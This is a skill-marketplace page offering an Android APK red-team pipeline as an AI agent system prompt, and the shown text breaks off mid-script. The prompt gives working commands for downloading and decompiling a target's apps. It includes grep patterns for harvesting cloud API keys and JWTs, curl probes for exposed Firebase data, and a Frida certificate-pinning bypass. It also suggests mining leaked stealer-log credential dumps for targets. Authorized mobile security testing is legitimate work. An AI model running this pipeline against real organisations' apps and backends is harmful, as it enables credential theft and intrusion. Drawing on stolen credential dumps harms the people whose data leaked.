Skills Plugins MCP Prompt Model 博客 我的中心
Development #api #web #mobile

apk-redteam-pipeline

End-to-end Android APK red-team pipeline — automated APK acquisition (Play Store + apkpure + apkmirror fallback), jadx decompilation, secret/URL/JWT/Firebase grep, pinned-cert extraction, exported-component enumeration, Frida runtime instrumentation templates, intent-injection probes. Built from an authorized external red-team engagement where 7 APKs were pulled manually, 4 download attempts truncated, and a hardcoded JWT + 30 internal API endpoints were recovered from one of the apps. Use when target has a mobile app catalogue (Play Store developer page), when you find an APK URL hosted on a web server, or when post-recon mentions "mobile app" in scope.

DeepseekModel Curated skill Quality Excellent · 90 v1.0.0

Get

https://deepseekmodel.com/api/download.php?id=elementalsouls-claude-bughunter-skills-apk-redteam-pipeline-skill-md&format=skill
Download .skill Standard format with system_prompt and model_config, ready for any agent framework
The actual content of the system_prompt field in the .skill file.
name apk-redteam-pipeline description End-to-end Android APK red-team pipeline — automated APK acquisition (Play Store + apkpure + apkmirror fallback), jadx decompilation, secret/URL/JWT/Firebase grep, pinned-cert extraction, exported-component enumeration, Frida runtime instrumentation templates, intent-injection probes. Built from an authorized external red-team engagement where 7 APKs were pulled manually, 4 download attempts truncated, and a hardcoded JWT + 30 internal API endpoints were recovered from one of the apps. Use when target has a mobile app catalogue (Play Store developer page), when you find an APK URL hosted on a web server, or when post-recon mentions "mobile app" in scope. sources authorized-engagement report_count 1 When to use this skill Trigger when: Recon surfaces 1+ mobile apps under the target's developer name (Play Store dev page) A web app hosts *.apk files directly (e.g. Recruitz.apk found on a subdomain during one engagement) APK package IDs leaked via stealer logs (e.g. com.<brand>.app , com.<brand>.<sub-brand> patterns in stealer dump format) Customer-facing app, dealer/partner portal, or employee mobile companion app is in scope Bug bounty program lists Android in scope DO NOT use for: iOS-only targets (different pipeline — IPA reverse, MobSF, frida-ios-dump) React Native / Flutter web apps already covered by JS bundle analysis Server-side only assessments Stage 0 — Inventory all org-owned apps Play Store developer-page scrape # Find developer page from the target's brand name curl -sk -A "Mozilla/5.0" "https://play.google.com/store/apps/developer?id=<Brand+Name>" -o /tmp/dev.html # Extract package IDs grep -oE 'id=[a-zA-Z0-9._]+' /tmp/dev.html | sort -u Example output (anonymized — 7 packages typical for a multi-brand conglomerate): com.events.<brand>build com.<corp>.<sub-brand-1> com.<corp>.<sub-brand-2> com.<corp>.<flagship> com.<corp>.<product-line-1> com.<corp>.<product-line-2> com.<corp>.<sub-brand-3> Cross-reference with stealer logs Stealer-log format includes package names like *@com.<corp>.<app> — extract these from creds_userpass.txt if you have a leaked dump. Brand permutation guesses (multi-brand conglomerate patterns) com.<brand>.app com.<brand>.mobile com.<brand>.android com.<brand>connect.app in.<brand>.dealer in.co.<brand>.app Stage 1 — APK acquisition Primary: APKPure direct (no auth required) # Follow 302 redirects to actual download curl -sk -L --max-time 60 \ "https://d.apkpure.net/b/APK/<package_id>?version=latest" \ -o "<package_id>.apk" # Or via the legacy d-XX.winudf.com mirror chain (we saw this work) Secondary: APKMirror search curl -sk -A "Mozilla/5.0" "https://www.apkmirror.com/?post_type=app_release&searchtype=apk&s=<brand>" \ | grep -oE 'href="[^"]+\.apk[^"]*"' | sort -u Tertiary: APKPure web search curl -sk "https://apkpure.com/search?q=<brand>" | grep -oE 'data-dt-app="[^"]+"' XAPK vs APK .xapk = a zip containing multiple split APKs (base + config.armeabi-v7a + config.en + etc.) Unzip outer first, then unzip the inner base.apk or <package>.apk Some apkpure downloads return truncated XAPK with missing EOCD signature — symptom of CDN rate-limiting; rotate IP and retry, OR use 7z x which is more lenient than unzip # Standard unzip (works for clean APK) unzip -o <package>.apk -d extracted_<package>/ # For truncated/repaired XAPK 7z x -y <package>.apk -o "extracted_<package>" # For nested XAPK for inner in extracted_<package>/*.apk; do mkdir -p "extracted_<package>/ $(basename " $inner " .apk) " unzip -o " $inner " -d "extracted_<package>/ $(basename " $inner " .apk) " done Stage 2 — DEX decompilation (jadx) # Install brew install jadx # macOS # or wget https://github.com/skylot/jadx/releases/latest/download/jadx-1.5.x.zip # Decompile jadx -d decompiled_<package>/ <package>.apk # For XAPK that contains multiple APKs for inner in extracted_<package>/*.apk; do jadx -d decompiled_<package>_$( basename " $inner " .apk)/ " $inner " done For a fast "strings only" pass without full decompilation: find extracted_<package> -name "classes*.dex" - exec strings -8 {} \; > strings_<package>.txt Stage 3 — Secret grep (the 60-pattern catalog) # URL grep — owned-domain references grep -oE 'https?://[a-zA-Z0-9.-]+\.(target1|target2|target3)\.(com|io|net|in)[a-zA-Z0-9./_?=&%-]*' strings_<package>.txt | sort -u # Internal IP / port URLs grep -oE 'https?://(10\.|172\.(1[6-9]|2[0-9]|3[01])\.|192\.168\.|127\.)[0-9.]+(:[0-9]+)?[a-zA-Z0-9./_?=&-]*' strings_<package>.txt # Cloud credentials grep -oE 'AKIA[A-Z0-9]{16}' # AWS Access Key grep -oE 'aws_secret_access_key[\s:=]+[A-Za-z0-9/+=]{40}' # AWS Secret grep -oE 'AIza[A-Za-z0-9_-]{35}' # Google API key grep -oE 'ya29\.[A-Za-z0-9_-]+' # Google OAuth refresh token grep -oE 'gh[ps]_[A-Za-z0-9]{36}' # GitHub PAT grep -oE 'glpat-[A-Za-z0-9_-]{20}' # GitLab PAT grep -oE 'xox[pbar]-[A-Za-z0-9-]+' # Slack token grep -oE 'sk-[A-Za-z0-9]{48}' # OpenAI API key grep -oE 'sk-ant-[A-Za-z0-9_-]{90,}' # Anthropic API key grep -oE 'AC[a-f0-9]{32}' # Twilio Account SID grep -oE 'sk_live_[A-Za-z0-9]{24}' # Stripe live key grep -oE 'pk_live_[A-Za-z0-9]{24}' # Stripe publishable grep -oE 'mailgun-[A-Za-z0-9-]{40}' # Mailgun grep -oE 'SG\.[A-Za-z0-9_-]{22}\.[A-Za-z0-9_-]{43}' # SendGrid # JWT (any algorithm) grep -oE 'eyJ[A-Za-z0-9_-]+\.eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]*' strings_<package>.txt # Firebase grep -oE '"(api_key|project_id|database_url|storage_bucket|client_id|mobilesdk_app_id|google_app_id|gcm_defaultSenderId)"\s*:\s*"[^"]+"' \ extracted_<package>/res/values/strings.xml \ extracted_<package>/google-services.json \ decompiled_<package>/resources/AndroidManifest.xml 2>/dev/null # OAuth client secrets grep -oE 'client_secret["\s:=]+[A-Za-z0-9_-]{24,}' strings_<package>.txt # Hardcoded passwords (heuristic — many false positives, manual review) grep -oE '"password"\s*:\s*"[^"]+"|password\s*=\s*"[^"]+"' decompiled_<package>/sources/**/*.java 2>/dev/null Real-world example finding (anonymized — from an authorized engagement) # Customer-facing APK shipped a hardcoded URL of this shape: https://api.<client>.example/<path-token>/<resource-token>?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.<payload>.<sig> # Decoded JWT payload: {"sid":<int>,"iat":<unix-ts>,"exp":<unix-ts>} # Expired ~8 years earlier — but path tokens + 30 /v1/* endpoints still useful intel Stage 4 — Pinned certificate extraction # Find .cer / .der / .pem files in assets/ find extracted_<package>/assets -iname "*.cer" -o -iname "*.der" -o -iname "*.pem" -o -iname "*.crt" 2>/dev/null # Or in network_security_config.xml find extracted_<package> -name "network_security_config.xml" - exec cat {} \; # For each cert, extract subject + SAN (might reveal new internal API hosts) for cert in $(find extracted_<package>/assets -iname "*.cer" ); do echo "=== $cert ===" openssl x509 - in " $cert " -noout -subject -issuer -dates 2>/dev/null openssl x509 - in " $cert " -noout -text 2>/dev/null | grep -E 'Subject:|DNS:|Issuer:|Validity' done Real-world example A customer-facing APK from an authorized engagement contained assets/api_<service>_<domain>_com.cer — revealed the existence of an api.<service>.<domain>.example asset that had NOT surfaced in passive recon. Stage 5 — Exported component enumeration AndroidManifest.xml lists components. Exported ones (especially with android:exported="true" or implicit-export via intent-filter) can be triggered by other apps — potential intent-injection attack surface. # Decode binary AndroidManifest if needed apktool d <package>.apk -o decoded_<package>/ # apktool decodes binary manifest # Or read directly from jadx output cat decompiled_<package>/resources/AndroidManifest.xml | grep -E '<(activity|service|receiver|provider)' | head -50 # Filter exported grep -E 'android:exported="true"' decompiled_<package>/resources/AndroidManifest.xml For each exported component, check: Does it accept extras that flow into a WebView (intent → WebView → XSS / file://) Does it accept URI extras (potential SSRF via deep link) Does it pass extras to other Activities (intent redirection) Stage 6 — Firebase / cloud-service config inspection # google-services.json — full Firebase config find extracted_<package> -name "google-services.json" - exec cat {} \; | python3 -m json.tool # Look for: # project_id → can guess Firestore / RTDB URL: https://<project_id>.firebaseio.com/.json # storage_bucket → can guess GCS bucket: gs://<bucket> # web_api_key → can use to enumerate Firebase tenant config # Test if Firestore is publicly readable curl -s "https://firestore.googleapis.com/v1/projects/<project_id>/databases/(default)/documents/users" # Test if Realtime DB is publicly readable curl -s "https://<project_id>.firebaseio.com/.json" # Test if Storage Bucket is publicly listable curl -s "https://firebasestorage.googleapis.com/v0/b/<bucket>/o" Stage 7 — Runtime instrumentation (Frida) For when static analysis isn't enough — you want to dump tokens at runtime, bypass cert pinning, or trace API calls. Setup pip install --break-system-packages frida-tools objection adb devices # ensure device/emulator connected # Push frida-server to device (root required, or use rooted emulator like Genymotion / x86_64 AVD) Cert-pinning bypass (universal) // frida-script-pinning-bypass.js Java . perform ( function ( ) { // OkHttp try { var CertificatePinner = Java . use ( 'okhttp3.CertificatePinner' ); CertificatePinner . check . overload ( 'java.lang.String' , 'java.util.List' ). implementation = function ( ) { console . log ( '[+] OkHttp pinning bypassed for: ' + arguments [ 0 ]); return ; }; } catch (e) {} // HttpsURLConnection try { var TrustManagerImpl = Java . use ( 'com.android.org.conscrypt.TrustManagerImpl' ); TrustManagerImpl . verifyChain . implementation = function ( chain ) { console . log ( '[+] TrustManagerImpl verifyChain bypassed' ); return chain; }; } catch (e) {} }); frida -U -l frida-script-pinning-bypass.js -f <package_id> --no-pause Hook HTTP requests Java . perform ( function ( ) { var OkHttpClient = Java . use ( 'okhttp3.OkHttpClient' ); var Request = Java . use ( 'okhttp3.Request' ); var Call = Java . use ( 'okhttp3.Call' ); OkHttpClient . newCall . implementation = function ( req ) { var url = req. url (). toString ();
Keywords that activate this skill. Click one to copy it.

This skill does not provide trigger words.

The downloaded .skill package contains the following fields.
Field Description
formatFormat tag (skill/v1)
skill_idUnique skill ID
nameSkill name
versionVersion
descriptionDescription
categoryCategories (array)
trigger_wordsTrigger words
tagsTags
sourceSource
source_urlSource URL (this page)
exported_atExported at (set per download)
system_promptSystem prompt body
model_configModel config: provider / model / temperature / max_tokens / top_p
examplesExamples
install_guideImport guide for Coze / Dify / Claude / custom frameworks
The same skill can be exported in different platform formats.
.skill Standard format with system_prompt and model_config, ready for any agent framework Download
.skillpro Enhanced format with scripts, tools, dependencies and hooks Download
.json Plain JSON export with system_prompt and model parameters only Download
Coze Markdown with frontmatter, for Coze platform import Download
Dify Dify DSL, import directly after creating an app Download

每日精选 Skill 推荐,免费送到你邮箱

输入邮箱,每天接收一个精选 AI Agent 技能推荐。完全免费,持续更新。

验证码 --

提交后我们会发送一封确认邮件,点击邮件里的链接才会开始收信。

完全免费,取消任意时间。我们不会发送垃圾邮件。